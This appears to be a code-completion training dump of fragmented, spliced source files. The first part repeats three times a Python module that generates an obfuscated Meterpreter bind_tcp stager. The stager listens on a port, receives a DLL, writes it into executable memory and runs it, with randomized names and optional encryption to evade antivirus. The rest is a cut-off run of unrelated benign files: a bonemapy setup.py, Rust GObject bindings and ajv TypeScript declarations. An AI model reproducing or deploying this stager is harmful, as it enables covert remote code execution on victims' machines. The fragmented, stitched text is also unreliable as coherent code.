# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return |
# required options | random_line_split |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
|
self.payload_source_code = payload_code
return
| payload_code = encryption.pyherion(payload_code) | conditional_block |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
|
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]} | identifier_body |
setup.py | # -*- coding: utf-8 -*-
# Copyright (C) 2013 Michael Hogg
# This file is part of bonemapy - See LICENSE.txt for information on usage and redistribution
import bonemapy
from distutils.core import setup
setup(
name = 'bonemapy',
version = bonemapy.__version__,
description = 'An ABAQUS plug-in to map bone properties from CT scans to 3D finite element bone/implant models',
license = 'MIT license',
keywords = ["ABAQUS", "plug-in","CT","finite","element","bone","properties","python"],
author = 'Michael Hogg',
author_email = '[email protected]',
url = "https://github.com/mhogg/bonemapy",
download_url = "https://github.com/mhogg/bonemapy/releases",
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 2", | "Development Status :: 4 - Beta",
"Environment :: Other Environment",
"Environment :: Plugins",
"Intended Audience :: Healthcare Industry",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Medical Science Apps.",
"Topic :: Scientific/Engineering :: Visualization",
],
long_description = """
bonemapy is an ABAQUS plug-in that is used to extract bone density, or Hounsfield Unit (HU) values, from CT scans. The bone density can then be used to setup heterogeneous
material properties for a 3D finite element bone/implant model.
The HU values are extracted at the element integration points. Tri-linear interpolation is used to calculate the HU values at the location of the integration points.
bonemapy produces a text file containing the HU values that is formatted so that it can easily be read using ABAQUS user subroutines that are required to apply the bone properties. An
ABAQUS odb file is also created containing a fieldoutput representing HU so that the user can quickly visualise the mapped HU values.
""",
) | "Programming Language :: Python :: 2.6", | random_line_split |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int |
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn get_offset(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
}
| {
unsafe { g_field_info_get_size(info) as int }
} | identifier_body |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo, | value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_size(info) as int }
}
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn get_offset(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
} | mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer, | random_line_split |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_size(info) as int }
}
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn | (info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
}
| get_offset | identifier_name |
angular2.webpack.config.js | const path = require( 'path' );
const pkg = require( './package.json' );
const webpack = require( 'laxar-infrastructure' ).webpack( {
context: __dirname,
resolve: {
extensions: [ '.js', '.jsx', '.ts', '.tsx' ]
},
module: {
rules: [
{
test: /\.tsx?$/,
exclude: /node_modules\/.*\/spec\//,
loader: 'ts-loader'
},
{
test: /\.jsx?$/,
exclude: path.resolve( __dirname, 'node_modules' ),
loader: 'babel-loader'
},
{
test: /\.spec.js$/, | ]
}
} );
module.exports = [
webpack.library(),
webpack.browserSpec( [ `./spec/${pkg.name}.spec.js` ] )
]; | exclude: path.resolve( __dirname, 'node_modules' ),
loader: 'laxar-mocks/spec-loader'
} | random_line_split |
core.d.ts | export { Format, FormatDefinition, AsyncFormatDefinition, KeywordDefinition, KeywordErrorDefinition, CodeKeywordDefinition, MacroKeywordDefinition, FuncKeywordDefinition, Vocabulary, Schema, SchemaObject, AnySchemaObject, AsyncSchema, AnySchema, ValidateFunction, AsyncValidateFunction, ErrorObject, } from "./types";
export { SchemaCxt, SchemaObjCxt } from "./compile";
export interface Plugin<Opts> {
(ajv: Ajv, options?: Opts): Ajv;
[prop: string]: any;
}
import KeywordCxt from "./compile/context";
export { KeywordCxt };
export { DefinedError } from "./vocabularies/errors";
export { JSONType } from "./compile/rules";
export { JSONSchemaType } from "./types/json-schema";
export { _, str, stringify, nil, Name, Code, CodeGen, CodeGenOptions } from "./compile/codegen";
import type { Schema, AnySchema, AnySchemaObject, SchemaObject, AsyncSchema, Vocabulary, KeywordDefinition, AddedKeywordDefinition, AnyValidateFunction, ValidateFunction, AsyncValidateFunction, ErrorObject, Format, AddedFormat } from "./types";
import type { JSONSchemaType } from "./types/json-schema";
import { ValidationError, MissingRefError } from "./compile/error_classes";
import { ValidationRules } from "./compile/rules";
import { SchemaEnv } from "./compile";
import { Code, ValueScope } from "./compile/codegen";
export declare type Options = CurrentOptions & DeprecatedOptions;
interface CurrentOptions {
strict?: boolean | "log";
strictTypes?: boolean | "log";
strictTuples?: boolean | "log";
allowMatchingProperties?: boolean;
allowUnionTypes?: boolean;
validateFormats?: boolean;
$data?: boolean;
allErrors?: boolean;
verbose?: boolean;
$comment?: true | ((comment: string, schemaPath?: string, rootSchema?: AnySchemaObject) => unknown);
formats?: {
[Name in string]?: Format;
};
keywords?: Vocabulary;
schemas?: AnySchema[] | {
[key: string]: AnySchema;
};
logger?: Logger | false;
loadSchema?: (uri: string) => Promise<AnySchemaObject>;
removeAdditional?: boolean | "all" | "failing";
useDefaults?: boolean | "empty";
coerceTypes?: boolean | "array";
next?: boolean;
unevaluated?: boolean;
dynamicRef?: boolean;
meta?: SchemaObject | boolean;
defaultMeta?: string | AnySchemaObject;
validateSchema?: boolean | "log";
addUsedSchema?: boolean;
inlineRefs?: boolean | number;
passContext?: boolean;
loopRequired?: number;
loopEnum?: number;
ownProperties?: boolean;
multipleOfPrecision?: boolean | number;
messages?: boolean;
code?: CodeOptions;
}
export interface CodeOptions {
es5?: boolean;
lines?: boolean;
optimize?: boolean | number;
formats?: Code;
source?: boolean;
process?: (code: string, schema?: SchemaEnv) => string;
}
interface InstanceCodeOptions extends CodeOptions {
optimize: number;
}
interface DeprecatedOptions {
/** @deprecated */
ignoreKeywordsWithRef?: boolean;
/** @deprecated */
jsPropertySyntax?: boolean;
/** @deprecated */
unicode?: boolean;
}
declare type RequiredInstanceOptions = {
[K in "strict" | "strictTypes" | "strictTuples" | "inlineRefs" | "loopRequired" | "loopEnum" | "meta" | "messages" | "addUsedSchema" | "validateSchema" | "validateFormats"]: NonNullable<Options[K]>;
} & {
code: InstanceCodeOptions;
};
export declare type InstanceOptions = Options & RequiredInstanceOptions;
export interface Logger {
log(...args: unknown[]): unknown;
warn(...args: unknown[]): unknown;
error(...args: unknown[]): unknown;
}
export default class | {
opts: InstanceOptions;
errors?: ErrorObject[] | null;
logger: Logger;
readonly scope: ValueScope;
readonly schemas: {
[key: string]: SchemaEnv | undefined;
};
readonly refs: {
[ref: string]: SchemaEnv | string | undefined;
};
readonly formats: {
[name: string]: AddedFormat | undefined;
};
readonly RULES: ValidationRules;
readonly _compilations: Set<SchemaEnv>;
private readonly _loading;
private readonly _cache;
private readonly _metaOpts;
static ValidationError: typeof ValidationError;
static MissingRefError: typeof MissingRefError;
constructor(opts?: Options);
_addVocabularies(): void;
_addDefaultMetaSchema(): void;
defaultMeta(): string | AnySchemaObject | undefined;
validate(schema: Schema | string, data: unknown): boolean;
validate(schemaKeyRef: AnySchema | string, data: unknown): boolean | Promise<unknown>;
validate<T>(schema: Schema | JSONSchemaType<T> | string, data: unknown): data is T;
validate<T>(schema: AsyncSchema, data: unknown | T): Promise<T>;
validate<T>(schemaKeyRef: AnySchema | string, data: unknown): data is T | Promise<T>;
compile<T = unknown>(schema: Schema | JSONSchemaType<T>, _meta?: boolean): ValidateFunction<T>;
compile<T = unknown>(schema: AsyncSchema, _meta?: boolean): AsyncValidateFunction<T>;
compile<T = unknown>(schema: AnySchema, _meta?: boolean): AnyValidateFunction<T>;
compileAsync<T = unknown>(schema: SchemaObject | JSONSchemaType<T>, _meta?: boolean): Promise<ValidateFunction<T>>;
compileAsync<T = unknown>(schema: AsyncSchema, meta?: boolean): Promise<AsyncValidateFunction<T>>;
compileAsync<T = unknown>(schema: AnySchemaObject, meta?: boolean): Promise<AnyValidateFunction<T>>;
addSchema(schema: AnySchema | AnySchema[], // If array is passed, `key` will be ignored
key?: string, // Optional schema key. Can be passed to `validate` method instead of schema object or id/ref. One schema per instance can have empty `id` and `key`.
_meta?: boolean, // true if schema is a meta-schema. Used internally, addMetaSchema should be used instead.
_validateSchema?: boolean | "log"): Ajv;
addMetaSchema(schema: AnySchemaObject, key?: string, // schema key
_validateSchema?: boolean | "log"): Ajv;
validateSchema(schema: AnySchema, throwOrLogError?: boolean): boolean | Promise<unknown>;
getSchema<T = unknown>(keyRef: string): AnyValidateFunction<T> | undefined;
removeSchema(schemaKeyRef?: AnySchema | string | RegExp): Ajv;
addVocabulary(definitions: Vocabulary): Ajv;
addKeyword(kwdOrDef: string | KeywordDefinition, def?: KeywordDefinition): Ajv;
getKeyword(keyword: string): AddedKeywordDefinition | boolean;
removeKeyword(keyword: string): Ajv;
addFormat(name: string, format: Format): Ajv;
errorsText(errors?: ErrorObject[] | null | undefined, // optional array of validation errors
{ separator, dataVar }?: ErrorsTextOptions): string;
$dataMetaSchema(metaSchema: AnySchemaObject, keywordsJsonPointers: string[]): AnySchemaObject;
private _removeAllSchemas;
private _addSchema;
private _checkUnique;
private _compileSchemaEnv;
private _compileMetaSchema;
}
export interface ErrorsTextOptions {
separator?: string;
dataVar?: string;
}
| Ajv | identifier_name |
core.d.ts | export { Format, FormatDefinition, AsyncFormatDefinition, KeywordDefinition, KeywordErrorDefinition, CodeKeywordDefinition, MacroKeywordDefinition, FuncKeywordDefinition, Vocabulary, Schema, SchemaObject, AnySchemaObject, AsyncSchema, AnySchema, ValidateFunction, AsyncValidateFunction, ErrorObject, } from "./types";
export { SchemaCxt, SchemaObjCxt } from "./compile";
export interface Plugin<Opts> {
(ajv: Ajv, options?: Opts): Ajv;
[prop: string]: any;
}
import KeywordCxt from "./compile/context";
export { KeywordCxt };
export { DefinedError } from "./vocabularies/errors"; | import type { Schema, AnySchema, AnySchemaObject, SchemaObject, AsyncSchema, Vocabulary, KeywordDefinition, AddedKeywordDefinition, AnyValidateFunction, ValidateFunction, AsyncValidateFunction, ErrorObject, Format, AddedFormat } from "./types";
import type { JSONSchemaType } from "./types/json-schema";
import { ValidationError, MissingRefError } from "./compile/error_classes";
import { ValidationRules } from "./compile/rules";
import { SchemaEnv } from "./compile";
import { Code, ValueScope } from "./compile/codegen";
export declare type Options = CurrentOptions & DeprecatedOptions;
interface CurrentOptions {
strict?: boolean | "log";
strictTypes?: boolean | "log";
strictTuples?: boolean | "log";
allowMatchingProperties?: boolean;
allowUnionTypes?: boolean;
validateFormats?: boolean;
$data?: boolean;
allErrors?: boolean;
verbose?: boolean;
$comment?: true | ((comment: string, schemaPath?: string, rootSchema?: AnySchemaObject) => unknown);
formats?: {
[Name in string]?: Format;
};
keywords?: Vocabulary;
schemas?: AnySchema[] | {
[key: string]: AnySchema;
};
logger?: Logger | false;
loadSchema?: (uri: string) => Promise<AnySchemaObject>;
removeAdditional?: boolean | "all" | "failing";
useDefaults?: boolean | "empty";
